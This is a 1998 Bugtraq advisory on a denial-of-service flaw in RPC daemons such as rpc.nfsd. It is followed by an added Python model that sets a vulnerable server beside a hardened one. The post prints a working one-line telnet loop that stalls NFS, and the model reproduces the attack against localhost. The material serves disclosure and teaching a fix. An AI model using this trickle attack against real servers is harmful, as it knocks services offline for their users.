Bugtraq mailing list archives
easy DoS in most RPC apps
From: peter () attic vuurwerk nl (Peter van Dijk)
Date: Sat, 28 Mar 1998 13:25:26 +0100
This is something Juggler found while poking around his ports. I investigated the problem further.

If you connect (using telnet, netcat, anything) to a TCP port assigned to some RPC protocol (tested with rpc.nfsd/mountd/portmap on Slackware 3.4/Kernel 2.0.33) and send some 'garbage' (like a newline ;) every 5 seconds or faster, the service will completely stop responding. At the very moment the connection is closed, the service will return to normal work again.

strace shows the following (from rpc.nfsd [nfs-server-2.2beta29]):

    alarm(5)                                 = 0
    sigreturn()                              = ? (mask now [])
    select(256, [4 5], NULL, NULL, NULL)     = 1 (in [5])
    accept(5, {sin_family=AF_INET, sin_port=htons(12406), sin_addr=inet_addr("127.0.0.1")}, [16]) = 0
    select(256, [0 4 5], NULL, NULL, NULL)   = 1 (in [0])
    select(256, [0], NULL, NULL, {35, 0})    = 1 (in [0], left {35, 0})
    read(0, "\r\n", 4000)                    = 2

The connection is accepted, after which a new select is started with both old file descriptors (tcp and udp listening sockets) and the new connection. Then some data arrives on the new connection, after which select is started with _only_ this connection as a parameter. Then a read is started, which can only be aborted by dropping the connection or hitting SIGALRM (which happens after 5 seconds). Right about that time, another newline is sent, restarting the whole loop.

This bug can easily be exploited remotely without any special software and without taking any noticeable bandwidth (one packet every 5 seconds). This one worked perfectly for me:

    $ { while true ; do echo ; sleep 5 ; done } | telnet localhost 2049

Replacing the sleep 5 with sleep 6 or even more shows that the service will then respond every once in a while.

Further examination shows that rpc.pcnfsd and rpc.ypxfrd are probably also vulnerable, as most other RPC applications that support TCP will be.

Greetz, Peter.

------------------------------------------------------------------------------
                                 . 'Selfishness and separation have led me to .
Peter 'Hardbeat' van Dijk        . to believe that the world is not my problem .
network security consultant      . I am the world. And you are the world.'    .
(yeah, right...)                 . Live - 10.000 years (peace is now)          .
peter () attic vuurwerk nl
------------------------------------------------------------------------------
12:27am up 1 day, 23:05, 3 users, load average: 0.07, 0.10, 0.03
------------------------------------------------------------------------------
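The select/read pattern in the strace, modelled as an added example (my own constructed code, not nfs-server's source and not part of Peter's post). It assumes the RPC-over-TCP record-marking format (4-byte header, high bit marks the last fragment) for requests, scales the 5-second alarm down to fractions of a second so the demonstration finishes quickly, and pairs the vulnerable loop with an assumed fix that keeps every socket in select() and evicts a peer that never completes a record. The names vulnerable_server, hardened_server and run_attack are mine; run_attack is the "echo; sleep 5" loop from the post in socket form, with a second client checking whether the server still answers.

```python
"""Constructed model of the loop the strace shows, beside a hardened loop.  Not
nfs-server code.  Requests are RPC-over-TCP records (4-byte big-endian header:
high bit = last fragment, low 31 bits = length); the reply echoes the payload."""
import select
import socket
import struct
import threading
import time

def encode_record(payload):
    return struct.pack("!I", 0x80000000 | len(payload)) + payload

def split_record(buf):
    """(payload, remainder) if buf starts with a complete record, else None."""
    if len(buf) < 4:
        return None
    n = struct.unpack("!I", buf[:4])[0] & 0x7FFFFFFF
    return (buf[4:4 + n], buf[4 + n:]) if len(buf) >= 4 + n else None

def vulnerable_server(listener, stop, slot_timeout):
    """As in the strace: once one connection has data, select() on it alone until
    its record completes; only a timeout (the 5 s SIGALRM) or a close frees it."""
    conns = set()
    while not stop.is_set():
        for s in select.select([listener, *conns], [], [], 0.05)[0]:
            if s is listener:
                conns.add(s.accept()[0])
                continue
            buf = b""
            while not stop.is_set():
                if not select.select([s], [], [], slot_timeout)[0]:
                    break                      # "alarm" fired: restart the loop
                chunk = s.recv(4000)
                if not chunk:
                    conns.discard(s)
                    s.close()
                    break
                buf += chunk
                rec = split_record(buf)
                if rec:
                    s.sendall(encode_record(rec[0]))
                    break

def hardened_server(listener, stop, record_deadline):
    """Assumed fix (not nfs-server's): all sockets stay in select(), bytes are
    buffered per peer, and a peer that never finishes a record gets dropped."""
    conns = {}                                 # sock -> [buffer, record start]
    while not stop.is_set():
        readable = select.select([listener, *conns], [], [], 0.05)[0]
        now = time.monotonic()
        for s in readable:
            if s is listener:
                conns[s.accept()[0]] = [b"", None]
                continue
            chunk = s.recv(4000)
            if not chunk:
                conns.pop(s)                   # EOF: forget the peer
                s.close()
                continue
            state = conns[s]
            state[0] += chunk
            state[1] = now if state[1] is None else state[1]
            while (rec := split_record(state[0])):
                s.sendall(encode_record(rec[0]))
                state[0], state[1] = rec[1], (now if rec[1] else None)
        stale = [s for s, (_, t0) in conns.items() if t0 and now - t0 > record_deadline]
        for s in stale:                        # slow peer: drop it, serve the rest
            conns.pop(s)
            s.close()

def run_attack(server_fn, timeout, attack_for=1.0, trickle=0.05):
    """Trickle junk every `trickle` s on one connection (the post's 'echo; sleep
    5' loop, sped up); return the reply a second client gets, or None."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    addr, stop = listener.getsockname(), threading.Event()
    srv = threading.Thread(target=server_fn, args=(listener, stop, timeout), daemon=True)
    srv.start()
    attacker = socket.create_connection(addr)
    attacker.sendall(b"\n")
    time.sleep(0.2)                            # let the server commit to the attacker
    victim = socket.create_connection(addr)
    victim.sendall(encode_record(b"GETATTR"))
    reply, end = b"", time.monotonic() + attack_for
    while time.monotonic() < end and not split_record(reply):
        try:
            attacker.sendall(b"\n")
        except OSError:                        # hardened server already dropped us
            pass
        if select.select([victim], [], [], trickle)[0]:
            reply += victim.recv(4096)
    stop.set()
    srv.join()
    for s in (attacker, victim, listener):
        s.close()
    rec = split_record(reply)
    return rec[0] if rec else None

if __name__ == "__main__":
    print("vulnerable:", run_attack(vulnerable_server, 0.5))   # None
    print("hardened:  ", run_attack(hardened_server, 0.5))     # b'GETATTR'
```

Against vulnerable_server the second client gets nothing for as long as the junk keeps arriving faster than slot_timeout, which is exactly the "sleep 5 versus sleep 6" observation in the post: the timeout only ever fires if the attacker is slower than it. hardened_server answers the second client immediately and closes the junk connection once record_deadline passes, so the cost of a slow or hostile peer is one buffer and one file descriptor, not the whole daemon.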